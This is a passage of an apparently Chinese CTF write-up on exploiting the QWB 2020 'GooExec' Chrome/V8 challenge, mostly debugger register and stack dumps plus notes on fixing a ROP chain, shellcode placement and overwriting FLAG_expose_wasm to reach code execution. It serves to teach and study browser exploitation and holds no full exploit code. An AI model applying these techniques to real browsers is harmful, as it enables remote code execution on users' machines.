RAX 0x563d451a88d0 —▸ 0x563d44e586b0 ◂— push rbp RBX 0x7fff5a933638 —▸ 0x2159c818c320 ◂— 0x70007400740068 /* 'h' */ RCX 0xffffffffffffffc0 RDX 0x0 RDI 0x563d451e2c18 —▸ 0x563d451a88d0 —▸ 0x563d44e586b0 ◂— push rbp RSI 0x7fff5a933638 —▸ 0x2159c818c320 ◂— 0x70007400740068 /* 'h' */ R8 0x372627e097e0 —▸ 0x14c16ee5c3c0 ◂— 0x2000000003 R9 0x0 R10 0x7ffa6c321ffb ◂— '_ZN7content15RenderFrameImpl36ShouldReportDetailedMessageForSourceERKN5blink9WebStringE' R11 0x7ffa6d1f2d30 ◂— push rbp R12 0x0 R13 0x3 R14 0x563d451e2c18 —▸ 0x563d451a88d0 —▸ 0x563d44e586b0 ◂— push rbp R15 0x20 RBP 0x7fff5a933670 —▸ 0x7fff5a9336a0 —▸ 0x7fff5a933700 —▸ 0x7fff5a933760 —▸ 0x7fff5a933890 ◂— ... RSP 0x7fff5a933630 ◂— 0x70 /* 'p' */ RIP 0x7ffa6d1f2d87 ◂— call qword ptr [rax + 0x130] ──────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────── ► 0x7ffa6d1f2d87 call qword ptr [rax + 0x130] <0x563d44e5ca50> 0x7ffa6d1f2d8d mov ebx, eax 0x7ffa6d1f2d8f cmp byte ptr [rbp - 0x21], 0 0x7ffa6d1f2d93 jns 0x7ffa6d1f2d9e <0x7ffa6d1f2d9e> 0x7ffa6d1f2d95 mov rdi, qword ptr [rbp - 0x38] 0x7ffa6d1f2d99 call 0x7ffa6d58c2b0 <0x7ffa6d58c2b0> 0x7ffa6d1f2d9e mov eax, ebx 0x7ffa6d1f2da0 add rsp, 0x20 0x7ffa6d1f2da4 pop rbx 0x7ffa6d1f2da5 pop r12 0x7ffa6d1f2da7 pop r14 ───────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fff5a933630 ◂— 0x70 /* 'p' */ 01:0008│ rbx rsi 0x7fff5a933638 —▸ 0x2159c818c320 ◂— 0x70007400740068 /* 'h' */ 02:0010│ 0x7fff5a933640 ◂— 0x20 /* ' ' */ 03:0018│ 0x7fff5a933648 ◂— 0x8000000000000028 /* '(' */ 04:0020│ 0x7fff5a933650 —▸ 0x2159c7fd1870 —▸ 0x7ffa6d61dd70 —▸ 0x7ffa6d1e2bd0 ◂— push rbp 05:0028│ 0x7fff5a933658 —▸ 0x372627e097e0 —▸ 0x14c16ee5c3c0 ◂— 0x2000000003 06:0030│ 0x7fff5a933660 —▸ 0x7fff5a9336c0 —▸ 0x14c16ee5c3c0 ◂— 0x2000000003 07:0038│ 0x7fff5a933668 —▸ 0x7fff5a933680 —▸ 0x14c16ee5c3c0 ◂— 0x2000000003
通过栈回溯,发现自己写的脚本中含有去优化,所以crash了
突然间就触发不了断点了….
重新尝试删除部分脚本
下图可以发现rop_chain写入了
shellcode写入了
下一步尝试在ret下断点
断不下来,但是对比发现,应该是部分len/base指针写错了,改一改出现了下面的错
#0 __GI___pthread_mutex_lock (mutex=0x534944b84801a809) at ../nptl/pthread_mutex_lock.c:67
#1 0x00007f369c0b2c10 in v8::internal::StackGuard::CheckInterrupt(v8::internal::StackGuard::InterruptFlag) () at /home/ubuntu2004/now/Release/libv8.so
#2 0x00007f369c061e22 in v8::internal::Debug::OnThrow(v8::internal::Handle<v8::internal::Object>) () at /home/ubuntu2004/now/Release/libv8.so
#3 0x00007f369c098dcc in v8::internal::Isolate::Throw(v8::internal::Object, v8::internal::MessageLocation*) () at /home/ubuntu2004/now/Release/libv8.so
#4 0x00007f369c098af8 in v8::internal::Isolate::StackOverflow() () at /home/ubuntu2004/now/Release/libv8.so
#5 0x00007f369c3fbb60 in v8::internal::Runtime_StackGuard(int, unsigned long*, v8::internal::Isolate*) () at /home/ubuntu2004/now/Release/libv8.so
#6 0x00007f369bea2278 in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit () at /home/ubuntu2004/now/Release/libv8.so
#7 0x00007f369bf37db8 in Builtins_JumpLoopHandler () at /home/ubuntu2004/now/Release/libv8.so
#8 0x00007f369be36678 in Builtins_InterpreterEntryTrampoline () at /home/ubuntu2004/now/Release/libv8.so
#9 0x0000262e0000001e in ()
#10 0x0000262e088f0a61 in ()
#11 0x0000262e082e0c35 in ()
#12 0x0000262e00000042 in ()
#13 0x0000262e083824dd in ()
#14 0x0000000000000014 in ()
#15 0x0000262e0838fd99 in ()
#16 0x000000000000014e in ()
#17 0x0000262e088f0a69 in ()
#18 0x0000000000000002 in ()
#19 0x0000262e082e0fb5 in ()
#20 0x0000262e082e0b3d in ()
#21 0x00007ffec9d83a10 in ()
#22 0x00007f369be36678 in Builtins_InterpreterEntryTrampoline () at /home/ubuntu2004/now/Release/libv8.so
#23 0x0000262e0838fd81 in ()
#24 0x0000262e0838fd09 in ()
#25 0x0000262e084c2405 in ()
#26 0x0000000000001136 in ()
#27 0x0000000000001102 in ()
#28 0x0000000000000000 in ()
根据栈回溯 应该是栈溢出
我吐了,最后的问题出在变量名字上
还有这个mprotect实际只要了一个系统调用,而且后面跟了ret(后来发现多虑了,这就是protect)
5.2 chrome wasm
html1用来修改wasm标志“FLAG_expose_wasm” , 在同一个tag下运行html2实现RCE.
问题一,如何找FLAG_expose_wasm
首先尝试了使用pwndbg搜索
但是发现和真正要找的位置不同
按照博客作者说的使用ida进行分析
发现对于的so文件
将libv8.so拖入到ida里面
注意这里使用的是.data段的,不是got段
6 问题
迭代次数的问题
Chrome 与 v8 调试问题
同样的脚本在chrome跑
在v8跑
之后使用标准的脚本去跑,发现是可以跑出正确的结果,这时进行脚本的比对
问题出在
我在声明obj数组和uint数组前就输出了一次oob的len,~
chrome最后的调试
程序写50次就崩了
但是问题似乎不是出在这里
因为标准exp在加上输出后同样不行了
所以这里是不能输出的
7 参考
强网杯2020线下GooExec (mem2019.github.io)
强网杯2020-GooExec chrome pwn分析及两种利用思路 – 先知社区 (aliyun.com)
https://github.com/ray-cp/browser_pwn/tree/master/v8_pwn/qwb2020-final-GOOexec_chromium
https://bugs.chromium.org/p/chromium/issues/detail?id=799263
来源:freebuf.com 2020-12-22 11:52:16 by: Wi1Ler
请登录后发表评论
注册